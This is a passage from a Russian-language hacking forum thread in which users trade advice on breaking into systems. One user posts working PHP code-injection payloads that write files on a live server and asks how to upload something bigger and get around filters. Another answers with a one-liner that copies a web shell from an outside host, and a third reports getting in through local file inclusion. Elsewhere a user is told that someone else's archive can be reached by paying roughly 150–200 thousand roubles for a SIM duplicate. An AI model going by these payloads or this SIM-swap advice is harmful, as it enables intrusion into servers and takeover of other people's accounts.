HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #761  
Старый 12.09.2018, 23:18
zifus
Guest
Сообщений: n/a
Провел на форуме:
17650

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

то есть я себя позорю, а ты вопросом который можно выполнить только чёрной магией это тип норм
Не хуя нету но хочешь что то получить
л - логика
На вопрос ТС "Мне необходимо узнать, возможно ли" есть 3 ответа

1. Да

2. Нет

3. Может быть

А способов можно найти много, вплоть до того что дать по голове и забрать устройство где стоит приложение.
 
Ответить с цитированием

  #762  
Старый 15.09.2018, 17:31
likepro
Guest
Сообщений: n/a
Провел на форуме:
4346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Angelika  
Angelika said:

Мне нужно получить чужой архив, доступа к приложению нет никакого.
Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.
 
Ответить с цитированием

  #763  
Старый 20.09.2018, 16:08
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Есть PHP code injection

там все функции на загрузку или запись выключены

пишется только в папку tmp

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b,%20'111text');$a='

Вызывается

page1';$b=file_get_contents('/var/www/ru/tmp/333.php');echo%20$b;$a='

Как залить что то весомое ? как можно обойти фильтры ?

если записать в файл пхп код то выдает ошибку Parse error: syntax error, unexpected ';'

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b, '');$a='
 
Ответить с цитированием

  #764  
Старый 20.09.2018, 17:42
Angelika
Guest
Сообщений: n/a
Провел на форуме:
1889

Репутация: 0
По умолчанию

Цитата:
Сообщение от likepro  
likepro said:

Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.
Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?
 
Ответить с цитированием

  #765  
Старый 20.09.2018, 20:42
dmax0fw
Guest
Сообщений: n/a
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

если записать в файл пхп код то выдает ошибку
Parse error: syntax error, unexpected ';'
возможно дело в short_open_tag

попробуй записать так

PHP код:
PHP:
[
COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
 
Ответить с цитированием

  #766  
Старый 20.09.2018, 20:54
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

возможно дело в short_open_tag
попробуй записать так
PHP код:
PHP:
[
COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
Нет, та же ошибка
 
Ответить с цитированием

  #767  
Старый 20.09.2018, 20:55
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Нет, та же ошибка
Цитата:
Сообщение от dmax0fw  
dmax0fw said:

возможно дело в short_open_tag
попробуй записать так
PHP код:
PHP:
[
COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
Ругается именно на , если просто текст записать, то пишет.
 
Ответить с цитированием

  #768  
Старый 21.09.2018, 05:03
likepro
Guest
Сообщений: n/a
Провел на форуме:
4346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Angelika  
Angelika said:

Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?
Да
 
Ответить с цитированием

  #769  
Старый 28.09.2018, 03:49
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?

copy('http://lol.com/shell.txt','/pwd/shell.php');
 
Ответить с цитированием

  #770  
Старый 28.09.2018, 09:56
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от neur0funk  
neur0funk said:

у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?
copy('
http://lol.com/shell.txt','/pwd/shell.php');
copy system eval и так далее выключены. Уже залился через локал инклуид.

Если бы было так просто я бы не спрашивал.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ